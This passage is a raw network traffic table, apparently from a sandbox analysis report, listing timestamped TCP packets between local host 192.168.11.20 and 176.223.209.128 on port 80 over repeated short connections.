Nov 25, 2021 10:50:50.048511028 CET	80	50154	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:50.064557076 CET	80	50154	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:50.064613104 CET	80	50154	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:50.065000057 CET	50154	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:50.065082073 CET	50154	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:50.098664999 CET	80	50154	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:50.458864927 CET	50155	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:50.492970943 CET	80	50155	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:50.493273020 CET	50155	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:50.494750977 CET	50155	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:50.528776884 CET	80	50155	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:50.528975010 CET	50155	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:50.563003063 CET	80	50155	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:50.586895943 CET	80	50155	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:50.586955070 CET	80	50155	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:50.587085009 CET	50155	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:50.587152004 CET	50155	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:50.621417046 CET	80	50155	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:51.001228094 CET	50156	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:51.035280943 CET	80	50156	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:51.035481930 CET	50156	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:51.037018061 CET	50156	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:51.070998907 CET	80	50156	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:51.071177959 CET	50156	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:51.105413914 CET	80	50156	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:51.122132063 CET	80	50156	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:51.122193098 CET	80	50156	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:51.122420073 CET	50156	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:51.122483015 CET	50156	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:51.156735897 CET	80	50156	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:51.516078949 CET	50157	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:51.549952984 CET	80	50157	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:51.550193071 CET	50157	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:51.551708937 CET	50157	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:51.585659027 CET	80	50157	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:51.585876942 CET	50157	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:51.619924068 CET	80	50157	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:51.635710955 CET	80	50157	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:51.635776043 CET	80	50157	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:51.635935068 CET	50157	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:51.635997057 CET	50157	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:51.670233011 CET	80	50157	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:52.020174980 CET	50158	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:52.054817915 CET	80	50158	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:52.055082083 CET	50158	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:52.056652069 CET	50158	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:52.090630054 CET	80	50158	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:52.090846062 CET	50158	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:52.124851942 CET	80	50158	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:52.140773058 CET	80	50158	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:52.140826941 CET	80	50158	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:52.140980959 CET	50158	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:52.141088009 CET	50158	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:52.175060987 CET	80	50158	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:52.537107944 CET	50159	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:52.570549965 CET	80	50159	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:52.570821047 CET	50159	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:52.572449923 CET	50159	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:52.605848074 CET	80	50159	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:52.606086969 CET	50159	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:52.639329910 CET	80	50159	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:52.655607939 CET	80	50159	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:52.655658960 CET	80	50159	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:52.655774117 CET	50159	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:52.655822039 CET	50159	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:52.689320087 CET	80	50159	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:53.051934958 CET	50160	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:53.086097956 CET	80	50160	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:53.086364985 CET	50160	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:53.087853909 CET	50160	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:53.121843100 CET	80	50160	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:53.122066021 CET	50160	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:53.156225920 CET	80	50160	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:53.177290916 CET	80	50160	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:53.177344084 CET	80	50160	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:53.177552938 CET	50160	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:53.177604914 CET	50160	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:53.211762905 CET	80	50160	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:53.569302082 CET	50161	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:53.602720976 CET	80	50161	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:53.602986097 CET	50161	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:53.604490042 CET	50161	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:53.637825966 CET	80	50161	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:53.638037920 CET	50161	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:53.671411991 CET	80	50161	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:53.694844961 CET	80	50161	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:53.694892883 CET	80	50161	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:53.695060968 CET	50161	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:53.695111036 CET	50161	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:53.728544950 CET	80	50161	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:54.090658903 CET	50162	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:54.124325037 CET	80	50162	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:54.124594927 CET	50162	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:54.126116991 CET	50162	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:54.159446955 CET	80	50162	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:54.159674883 CET	50162	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:54.193259954 CET	80	50162	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:54.213871956 CET	80	50162	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:54.213927031 CET	80	50162	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:54.214126110 CET	50162	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:54.214178085 CET	50162	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:54.247766972 CET	80	50162	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:54.617338896 CET	50163	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:54.650863886 CET	80	50163	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:54.651114941 CET	50163	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:54.652802944 CET	50163	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:54.686148882 CET	80	50163	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:54.686389923 CET	50163	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:54.719723940 CET	80	50163	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:54.736171007 CET	80	50163	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:54.736221075 CET	80	50163	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:54.736464024 CET	50163	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:54.736514091 CET	50163	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:54.769864082 CET	80	50163	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:55.115322113 CET	50164	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:55.148752928 CET	80	50164	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:55.149075031 CET	50164	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:55.150613070 CET	50164	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:55.184010983 CET	80	50164	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:55.184221029 CET	50164	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:55.217573881 CET	80	50164	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:55.233901024 CET	80	50164	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:55.233949900 CET	80	50164	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:55.234112978 CET	50164	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:55.234174013 CET	50164	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:55.267647982 CET	80	50164	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:55.607436895 CET	50166	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:55.641369104 CET	80	50166	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:55.641647100 CET	50166	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:55.643187046 CET	50166	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:55.677166939 CET	80	50166	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:55.677305937 CET	50166	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:55.711296082 CET	80	50166	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:55.729120016 CET	80	50166	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:55.729168892 CET	80	50166	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:55.729403973 CET	50166	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:55.729454994 CET	50166	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:55.763516903 CET	80	50166	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:56.127727985 CET	50167	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:56.161258936 CET	80	50167	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:56.161629915 CET	50167	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:56.163151979 CET	50167	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:56.196481943 CET	80	50167	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:56.196743965 CET	50167	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:56.230127096 CET	80	50167	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:56.246516943 CET	80	50167	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:56.246582031 CET	80	50167	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:56.246759892 CET	50167	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:56.246838093 CET	50167	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:56.280214071 CET	80	50167	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:56.576666117 CET	50168	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:56.610477924 CET	80	50168	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:56.611074924 CET	50168	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:56.612755060 CET	50168	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:56.645992994 CET	80	50168	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:56.646243095 CET	50168	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:56.679594040 CET	80	50168	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:56.695430040 CET	80	50168	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:56.695453882 CET	80	50168	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:56.695599079 CET	50168	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:56.695641994 CET	50168	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:56.728954077 CET	80	50168	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:57.087737083 CET	50169	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:57.121862888 CET	80	50169	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:57.122133017 CET	50169	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:57.123615026 CET	50169	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:57.157598972 CET	80	50169	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:57.157768011 CET	50169	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:57.191732883 CET	80	50169	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:57.211141109 CET	80	50169	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:57.211196899 CET	80	50169	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:57.211467981 CET	50169	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:57.211549997 CET	50169	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:57.245551109 CET	80	50169	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:57.610624075 CET	50170	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:57.644810915 CET	80	50170	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:57.644990921 CET	50170	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:57.646528006 CET	50170	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:57.680562019 CET	80	50170	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:57.680763960 CET	50170	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:57.714801073 CET	80	50170	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:57.730470896 CET	80	50170	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:57.730551004 CET	80	50170	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:57.730720997 CET	50170	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:57.730765104 CET	50170	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:57.764816999 CET	80	50170	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:58.101722956 CET	50171	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:58.134856939 CET	80	50171	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:58.135004997 CET	50171	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:58.136639118 CET	50171	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:58.169874907 CET	80	50171	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:58.170049906 CET	50171	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:58.203355074 CET	80	50171	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:58.222412109 CET	80	50171	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:58.222486019 CET	80	50171	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:58.222671032 CET	50171	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:58.222731113 CET	50171	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:58.256042004 CET	80	50171	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:58.539530993 CET	50172	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:58.572695017 CET	80	50172	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:58.572873116 CET	50172	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:58.574451923 CET	50172	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:58.607569933 CET	80	50172	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:58.607743979 CET	50172	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:58.641561031 CET	80	50172	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:58.660414934 CET	80	50172	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:58.660470009 CET	80	50172	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:58.660661936 CET	50172	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:58.660716057 CET	50172	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:58.694258928 CET	80	50172	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:59.045864105 CET	50173	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:59.079296112 CET	80	50173	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:59.079511881 CET	50173	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:59.081033945 CET	50173	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:59.114438057 CET	80	50173	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:59.114654064 CET	50173	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:59.148086071 CET	80	50173	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:59.164284945 CET	80	50173	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:59.164349079 CET	80	50173	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:59.164639950 CET	50173	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:59.164736032 CET	50173	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:59.198313951 CET	80	50173	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:59.558974028 CET	50174	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:59.592391968 CET	80	50174	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:59.592725039 CET	50174	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:59.594203949 CET	50174	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:59.627665043 CET	80	50174	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:59.627924919 CET	50174	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:59.661581039 CET	80	50174	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:59.683665991 CET	80	50174	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:59.683731079 CET	80	50174	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:59.684020996 CET	50174	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:59.684119940 CET	50174	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:59.717797995 CET	80	50174	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:00.079560041 CET	50175	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:00.113827944 CET	80	50175	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:00.114072084 CET	50175	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:00.115567923 CET	50175	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:00.149614096 CET	80	50175	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:00.149828911 CET	50175	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:00.183798075 CET	80	50175	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:00.202507973 CET	80	50175	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:00.202563047 CET	80	50175	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:00.202836990 CET	50175	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:00.202919006 CET	50175	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:00.237215042 CET	80	50175	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:00.586755991 CET	50176	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:00.619851112 CET	80	50176	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:00.620058060 CET	50176	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:00.621598959 CET	50176	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:00.654839993 CET	80	50176	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:00.655038118 CET	50176	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:00.688433886 CET	80	50176	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:00.705142021 CET	80	50176	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:00.705190897 CET	80	50176	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:00.705440998 CET	50176	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:00.705487967 CET	50176	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:00.738848925 CET	80	50176	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:01.098184109 CET	50177	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:01.131614923 CET	80	50177	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:01.131995916 CET	50177	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:01.133542061 CET	50177	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:01.166907072 CET	80	50177	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:01.167103052 CET	50177	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:01.200433969 CET	80	50177	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:01.217782021 CET	80	50177	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:01.217834949 CET	80	50177	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:01.217969894 CET	50177	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:01.218028069 CET	50177	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:01.251415014 CET	80	50177	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:01.621284008 CET	50178	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:01.654668093 CET	80	50178	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:01.654891968 CET	50178	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:01.656410933 CET	50178	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:01.689815044 CET	80	50178	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:01.690049887 CET	50178	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:01.723429918 CET	80	50178	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:01.738830090 CET	80	50178	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:01.738878965 CET	80	50178	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:01.739087105 CET	50178	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:01.739135027 CET	50178	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:01.772613049 CET	80	50178	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:02.130671978 CET	50179	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:02.164815903 CET	80	50179	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:02.165071964 CET	50179	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:02.166862011 CET	50179	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:02.200921059 CET	80	50179	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:02.201144934 CET	50179	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:02.235243082 CET	80	50179	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:02.254659891 CET	80	50179	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:02.254725933 CET	80	50179	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:02.254911900 CET	50179	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:02.255009890 CET	50179	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:02.289185047 CET	80	50179	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:02.640651941 CET	50180	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:02.674122095 CET	80	50180	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:02.674257040 CET	50180	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:02.675779104 CET	50180	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:02.709079027 CET	80	50180	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:02.709252119 CET	50180	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:02.742666960 CET	80	50180	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:02.758126020 CET	80	50180	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:02.758182049 CET	80	50180	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:02.758486032 CET	50180	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:02.758569002 CET	50180	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:02.792284012 CET	80	50180	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:03.162358999 CET	50181	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:03.195856094 CET	80	50181	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:03.196077108 CET	50181	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:03.197638988 CET	50181	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:03.230962038 CET	80	50181	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:03.231167078 CET	50181	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:03.264723063 CET	80	50181	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:03.291152954 CET	80	50181	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:03.291222095 CET	80	50181	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:03.291435003 CET	50181	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:03.291496992 CET	50181	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:03.324795961 CET	80	50181	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:03.692280054 CET	50182	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:03.726407051 CET	80	50182	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:03.726603985 CET	50182	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:03.728226900 CET	50182	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:03.762197018 CET	80	50182	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:03.762459040 CET	50182	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:03.796542883 CET	80	50182	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:03.813153028 CET	80	50182	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:03.813203096 CET	80	50182	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:03.813352108 CET	50182	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:03.813401937 CET	50182	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:03.847527027 CET	80	50182	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:04.133866072 CET	50183	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:04.166975975 CET	80	50183	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:04.167171001 CET	50183	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:04.168731928 CET	50183	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:04.201744080 CET	80	50183	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:04.201977015 CET	50183	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:04.235094070 CET	80	50183	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:04.251219988 CET	80	50183	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:04.251270056 CET	80	50183	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:04.251496077 CET	50183	80	192.168.11.20	176.223.209.128
